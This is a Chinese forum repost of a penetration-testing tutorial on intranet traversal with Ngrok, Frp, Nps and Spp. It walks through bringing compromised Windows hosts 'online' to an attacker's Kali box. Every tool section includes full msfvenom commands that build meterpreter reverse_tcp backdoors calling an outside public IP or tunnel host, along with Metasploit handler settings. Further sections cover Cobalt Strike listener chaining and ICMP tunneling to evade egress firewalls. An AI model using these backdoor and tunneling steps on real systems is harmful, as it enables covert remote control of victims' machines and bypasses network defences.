羊蹓狼 发表于 2024-6-21 13:43:18

内网安全:内网穿透详解

目次
内网穿透技能
内网穿透原理
实验环境
内网穿透项目
内网穿透:Ngrok
配置服务端
客户端配置
客户端天生后门,等待目标上线
内网穿透:Frp
客户端服务端建立毗连
MSF天生后门,等待上线
内网穿透:Nps
服务端搭建配置
客户端配置
MSF天生后门上线
内网穿透:Spp
服务端
客户端
CS配置
总结:内网穿透技能解决了和内网主机毗连的问题

https://img-blog.csdnimg.cn/e13d5d3497c04bc3be78c1a8637235b9.png


内网穿透技能

这个技能可以解决的问题:


[*]穿透:实现“内网”控制“内网”,内网主机上线。
[*]隧道:解决内网主机协议的限制,实现通讯,之后上线。

内网穿透原理

内网穿透(NAT traversal)是一种技能,用于实现公网与内网之间的通讯毗连。当内网中的设备无法直接从公网访问时,内网穿透技能可以通过一些本领,让公网上的设备能够穿透到内网中的设备,建立起通讯毗连。
内网穿透的原理可以简朴描述如下:

[*] NAT(网络地点转换):在常见的网络环境中,内网通常由路由器或防火墙等设备举行网络地点转换(NAT),将内网中的私有IP地点转换为公网可路由的IP地点。这样,内网设备可以通过NAT设备与公网通讯,但公网无法直接访问内网设备。
[*] 穿透技能:为了实现内网穿透,须要借助一些特定的技能本领,使公网上的设备能够访问到内网中的设备。常见的穿透技能包括:

[*] 端口映射(Port Forwarding):通过在路由器上举行端口映射配置,将公网上的某个端口映射到内网中的设备,从而实现对该设备的访问。
[*] 反向署理(Reverse Proxy):在公网上搭建一个反向署理服务器,将公网请求转发到内网中的设备上。公网设备与反向署理服务器建立毗连后,由反向署理服务器将请求转发到内网设备,实现公网访问内网的功能。
[*] VPN(Virtual Private Network):通过建立VPN毗连,将公网和内网毗连在一起,使得公网用户可以通过VPN隧道访问内网资源。VPN会创建一个假造的私有网络,将公网设备参加到该网络中,使其能够直接访问内网中的设备。
[*] 云服务:一些云服务提供商提供了内网穿透的解决方案,用户可以通过这些云服务将内网设备袒露到公网上,以实现公网访问内网的需求。


实验环境

目标:xiaodi8.com上线Kali的CS


[*]公网主机:xiaodi8.com
[*]内网Kali:192.168.1.166
正向毗连:Kali主动毗连xiaodi8.com,可行
反向毗连:xiaodi8.com毗连Kali,不可行
为了解决反向毗连的问题,须要使用内网穿透技能,实现外部主机毗连进入内网。这就是内网技能的意义所在。

内网穿透项目

一样寻常使用工具项目摆设,穿透项目:Ngrok,Frp,Spp,Nps,EW(克制更新,不再维护,不保举)
https://www.ngrok.cc
https://github.com/esrrhs/spp
https://github.com/fatedier/frp
https://github.com/ehang-io/nps
http://www.rootkiter.com/EarthWorm
优点:穿透加密数据,中间平台,防追踪,解决网络问题


内网穿透:Ngrok

项目地点:内网转发
免费版:仅支持三种协议,http,https,tcp

配置服务端

开通隧道,设置Kali内网IP,Port,以及服务器开放的端口
https://img-blog.csdnimg.cn/6dce8be521ee43a48dff0ca1dbbf4096.png
https://img-blog.csdnimg.cn/ed48537478cd49d48878ba7d9ec30d95.png

客户端配置

Kali实行客户端,这个过程相当于Kali主动毗连域名
./sunny clientid 203828291918 https://img-blog.csdnimg.cn/bdf694b5c9d7418aa54f66e5b4046ba0.png


客户端天生后门,等待目标上线

天生木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10039 -f exe -o tcp.exe
开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 2233
run
目标上线
https://img-blog.csdnimg.cn/6bea9fc069ed46b6a13176249accf107.png


内网穿透:Frp

项目地点:https://github.com/fatedier/frp
须要一台服务器
frp是一个专注于内网穿透的高性能的反向署理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转袒露到公网。

客户端服务端建立毗连

服务端
服务器修改配置文件frps.ini 隧道建立绑定在7000端口
bind_port = 7000
启动服务端
./frps -c ./frps.ini https://img-blog.csdnimg.cn/1525c4fc41124160a8c500e450c5a717.png

 客户端
修改配置文件frpc.ini   
隧道建立绑定在7000端口
服务端的6000端口受到数据会自动转发到本地的5555端口

server_addr = 47.94.236.117
server_port = 7000


type=tcp
local_ip=127.0.0.1
local_port=5555
remote_port=6000 启动客户端
./frpc -c ./frpc.ini https://img-blog.csdnimg.cn/b3cbf324cec14e0c8ad7ef170a3f33a0.png
客户端与服务端建立毗连

MSF天生后门,等待上线

天生后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6000 -f exe -o frp.exe
开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit
上线
https://img-blog.csdnimg.cn/1833d9bdfb6947939b54017356ad4885.png


内网穿透:Nps

相当于服务端搭建一个ngrok
项目地点:https://github.com/ehang-io/nps
下载项目到服务器,它有一个客户端,一个服务端
nps是一款轻量级、高性能、功能强盛的内网穿透署理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地付出接口调试、ssh访问、远程桌面,内网dns剖析等等……),此外还支持内网http署理、内网socks5署理、p2p等,并带有功能强盛的web管理端。
 
服务端搭建配置

安装nps
./nps install 运行nps
./nps   默认运行地点
http://IP:8080/
默认登录账号暗码
admin/123
创建客户端,天生密匙
https://img-blog.csdnimg.cn/da6734299925466b829d531c143a91be.png
添加协议隧道,绑定指向
将访问服务器5566端口的流量发送至客户端的6666端口
https://img-blog.csdnimg.cn/cf1bbcd298fd49d881125fb15d692a04.png


客户端配置

毗连服务端
./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v#创建客户端后自动生成密钥


MSF天生后门上线

天生后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5566 -f exe -o nps.exe
监听本地6666
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run
上线
https://img-blog.csdnimg.cn/a1b61532dd104edaaec56b86ef8e8ec4.png



内网穿透:Spp

项目地点:GitHub - esrrhs/spp: A simple and powerful proxy
支持的协议:tcp、udp、udp、icmp、http、kcp、quic
支持的范例:正向署理、反向署理、socks5正向署理、socks5反向署理
在对抗项目中有遇到过一些极端环境,好比目标封了tcp,http等常用出网的协议,但是icmp,dns等协议可能由于业务须要或者管理者安全意识不到位导致没有封干净。
在这种场景下就可以使用这些容易被忽视的协议举行隧道的搭建。

服务端

服务端运行,监听本地的ICMP流量
./spp -type server -proto ricmp -listen 0.0.0.0 https://img-blog.csdnimg.cn/53dd4c7460474a4291e5e3c63dc96c92.png

客户端

受控靶机运行,将本地5555端口流量转发至47.94.236.117 80端口上(TCP封装成ICMP)
spp -name “test” -type proxy_client -server 47.94.236.117 -fromaddr :5555 -toaddr :80 -proxyproto tcp -proto ricmp 服务端收到数据
https://img-blog.csdnimg.cn/5ed0797c17254bc798b0e31a7e066acd.png


CS配置

这个CS是运行在服务端的
创建两个监听器:
监听器1:http 47.94.236.117 8081
https://img-blog.csdnimg.cn/4138e6a58ca2457bb121645fa3d9d499.png
 
监听器2:http 127.0.0.1 8082 天生后门放到靶机上实行
https://img-blog.csdnimg.cn/76b0cd7d139145da972939407199e637.png

上线,天生监听器2的木马,上线监听器1
https://img-blog.csdnimg.cn/b7bef322b7c3457da34501e8a6709e3a.png


总结:内网穿透技能解决了和内网主机毗连的问题

区别于署理技能,隧道技能,三种技能都有解决通讯的问题,但是侧重不一样
署理技能可以把外网攻击机带进内网举行渗出
隧道技能解决了由于防火墙限制流量不出网的问题
内网穿透解决和内网主机建立毗连的问题,可以远程访问内网的服务器
要根据不同使用场景来选择使用。


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 内网安全:内网穿透详解